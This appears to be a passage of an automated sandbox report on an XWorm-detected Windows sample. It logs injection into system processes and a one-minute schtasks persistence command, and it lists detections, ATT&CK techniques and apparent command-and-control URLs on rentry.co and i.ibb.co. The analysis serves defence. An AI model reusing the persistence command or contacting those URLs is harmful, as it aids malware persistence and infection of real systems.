                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1A9A0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\explorer.exe base: 8700000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB06E0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 212DAEE0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\conhost.exe base: 1EF4F460000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E594900000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 18C88430000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 18FE0970000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1FDE2F60000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 2675A1B0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Users\user\Desktop\r8k29DBraE.exe base: 2616F300000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1CE10000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 21681980000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3BD0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE26F0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE3D690000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 25731DD0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\conhost.exe base: 19417AC0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FE9F0000Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1B0FEA20000Jump to behavior
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE2680000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE2680000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE2680000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE2680000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE2680000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE2680000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE2680000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE2680000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE2680000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE2680000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE2680000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Users\user\Desktop\wzcsapi.exe base: 1BF20000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE26C0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E0D0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 13DE26F0000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3580000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3580000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3580000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3580000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3580000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3580000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3580000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3580000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3580000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3580000
                Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WerFault.exe base: 265B3580000
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess created: C:\Users\user\Desktop\wzcsapi.exe "C:\Users\user\Desktop\wzcsapi.exe" Jump to behavior
                Source: C:\Users\user\Desktop\r8k29DBraE.exeProcess created: C:\Users\user\Desktop\wzcsvc.exe "C:\Users\user\Desktop\wzcsvc.exe" Jump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcsapi" /tr "%Current%\wzcsapi.exe"Jump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 1408 -ip 1408Jump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1408 -s 1088Jump to behavior
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD1B4C AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,4_2_00007FF6B5AD1B4C
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD1B4C AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,4_2_00007FF6B5AD1B4C
                Source: dwm.exe, 0000000E.00000002.2687636914.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000000E.00000000.1380454228.00000262EB2B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerd
                Source: winlogon.exe, 00000006.00000000.1359296508.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2653092837.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2690684615.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: winlogon.exe, 00000006.00000000.1359296508.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2653092837.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2690684615.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: winlogon.exe, 00000006.00000000.1359296508.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2653092837.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2690684615.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: winlogon.exe, 00000006.00000000.1359296508.000001CA7D6F0000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000006.00000002.2653092837.000001CA7D6F1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000E.00000002.2690684615.00000262EB6C1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F313C60 cpuid 1_2_000002616F313C60
                Source: C:\Users\user\Desktop\r8k29DBraE.exeQueries volume information: C:\Users\user\Desktop\r8k29DBraE.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\wzcsapi.exeQueries volume information: C:\Users\user\Desktop\wzcsapi.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation
                Source: C:\Users\user\Desktop\wzcsvc.exeCode function: 4_2_00007FF6B5AD1B4C AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,4_2_00007FF6B5AD1B4C
                Source: C:\Users\user\Desktop\r8k29DBraE.exeCode function: 1_2_000002616F597970 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_000002616F597970
                Source: C:\Users\user\Desktop\r8k29DBraE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: wzcsapi.exe, 00000003.00000002.2666839520.000000001B878000.00000004.00000020.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2666839520.000000001B7B0000.00000004.00000020.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2666839520.000000001B88E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: svchost.exe, 00000017.00000003.1476685922.000002A76AE63000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.1476275111.000002A76AE63000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1446658941.000002A76AE63000.00000004.00000001.00020000.00000000.sdmp, Amcache.hve.8.dr, Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.23.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\wzcsapi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\wzcsapi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\wzcsapi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\wzcsapi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\wzcsapi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\wzcsapi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\wzcsapi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                Source: C:\Users\user\Desktop\wzcsapi.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 3.2.wzcsapi.exe.28cf290.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.wzcsapi.exe.1bee0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wzcsapi.exe PID: 6880, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected XWorm
                Source: Yara matchFile source: 3.2.wzcsapi.exe.28cf290.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.wzcsapi.exe.1bee0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.wzcsapi.exe.28cf290.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.wzcsapi.exe.1bee0000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2674092147.000000001BEE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: wzcsapi.exe PID: 6880, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		1
                Credential API Hooking                		1
                System Time Discovery                		Remote Services11
                Archive Collected Data                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		1
                Scheduled Task/Job                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		LSASS Memory2
                File and Directory Discovery                		Remote Desktop Protocol1
                Credential API Hooking                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job                		Logon Script (Windows)1
                Access Token Manipulation                		1
                Abuse Elevation Control Mechanism                		Security Account Manager24
                System Information Discovery                		SMB/Windows Admin SharesData from Network Shared Drive11
                Encrypted Channel                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook713
                Process Injection                		2
                Obfuscated Files or Information                		NTDS351
                Security Software Discovery                		Distributed Component Object ModelInput Capture1
                Non-Standard Port                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                Scheduled Task/Job                		22
                Software Packing                		LSA Secrets2
                Process Discovery                		SSHKeylogging2
                Non-Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Timestomp                		Cached Domain Credentials41
                Virtualization/Sandbox Evasion                		VNCGUI Input Capture3
                Application Layer Protocol                		Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSync1
                Application Window Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                File Deletion                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt4
                Rootkit                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                Masquerading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd41
                Virtualization/Sandbox Evasion                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                Access Token Manipulation                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers713
                Process Injection                		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                Hidden Files and Directories                		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1533949 Sample: r8k29DBraE.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 100 54 rentry.co 2->54 56 i.ibb.co 2->56 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus / Scanner detection for submitted sample 2->62 64 Multi AV Scanner detection for submitted file 2->64 68 12 other signatures 2->68 9 r8k29DBraE.exe 5 2->9         started        signatures3 66 Connects to a pastebin service (likely for C&C) 54->66 process4 file5 44 C:\Users\user\Desktop\wzcsvc.exe, PE32+ 9->44 dropped 46 C:\Users\user\Desktop\wzcsapi.exe, PE32 9->46 dropped 76 Found direct / indirect Syscall (likely to bypass EDR) 9->76 78 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 9->78 13 wzcsvc.exe 1 9->13         started        16 wzcsapi.exe 14 3 9->16         started        19 WerFault.exe 19 16 9->19         started        signatures6 process7 dnsIp8 80 Antivirus detection for dropped file 13->80 82 Multi AV Scanner detection for dropped file 13->82 84 Machine Learning detection for dropped file 13->84 88 8 other signatures 13->88 22 lsass.exe 13->22 injected 25 svchost.exe 8 13->25         started        27 svchost.exe 13->27 injected 32 26 other processes 13->32 48 i.ibb.co 169.197.85.95, 443, 49767, 49773 PUREVOLTAGE-INCUS United States 16->48 50 rentry.co 104.26.2.16, 443, 49731 CLOUDFLARENETUS United States 16->50 52 2 other IPs or domains 16->52 86 Uses schtasks.exe or at.exe to add and modify task schedules 16->86 30 schtasks.exe 16->30         started        42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 19->42 dropped file9 signatures10 process11 dnsIp12 70 Creates files in the system32 config directory 22->70 72 Writes to foreign memory regions 22->72 34 svchost.exe 22->34         started        36 svchost.exe 22->36 injected 74 System process connects to network (likely due to code injection or exploit) 25->74 38 WerFault.exe 2 25->38         started        58 i.ibb.co 27->58 40 conhost.exe 30->40         started        signatures13 process14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                r8k29DBraE.exe67%ReversingLabsByteCode-MSIL.Trojan.Heracles
                r8k29DBraE.exe100%AviraTR/AVI.Agent.nhchy
                r8k29DBraE.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\Desktop\wzcsapi.exe100%AviraTR/Dropper.Gen
                C:\Users\user\Desktop\wzcsvc.exe100%AviraHEUR/AGEN.1362795
                C:\Users\user\Desktop\wzcsapi.exe100%Joe Sandbox ML
                C:\Users\user\Desktop\wzcsvc.exe100%Joe Sandbox ML
                C:\Users\user\Desktop\wzcsapi.exe83%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                C:\Users\user\Desktop\wzcsvc.exe88%ReversingLabsByteCode-MSIL.Trojan.Heracles

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%URL Reputationsafe
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                http://upx.sf.net0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/Issue0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/sc0%URL Reputationsafe
                http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%URL Reputationsafe
                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                rentry.co
                		104.26.2.16
                		truetrue
                  		unknown
                  windowsupdatebg.s.llnwi.net
                  		178.79.208.1
                  		truefalse
                    		unknown
                    i.ibb.co
                    		169.197.85.95
                    		truetrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://i.ibb.co/Dwrj41N/Image.pngfalse
                        		unknown
                        https://rentry.co/tranr/rawfalse
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdJL0xesvchost.exe, 0000000B.00000003.1586613115.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE2180000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd=svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdVJk9esvchost.exe, 0000000B.00000003.1586613115.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE2180000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdMesvchost.exe, 0000000B.00000002.2656318533.0000013DE2100000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/09/policy1psvchost.exe, 0000000B.00000002.2659982158.0000013DE215F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/09/policy=80600svchost.exe, 0000000B.00000003.1517373013.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSIDsvchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
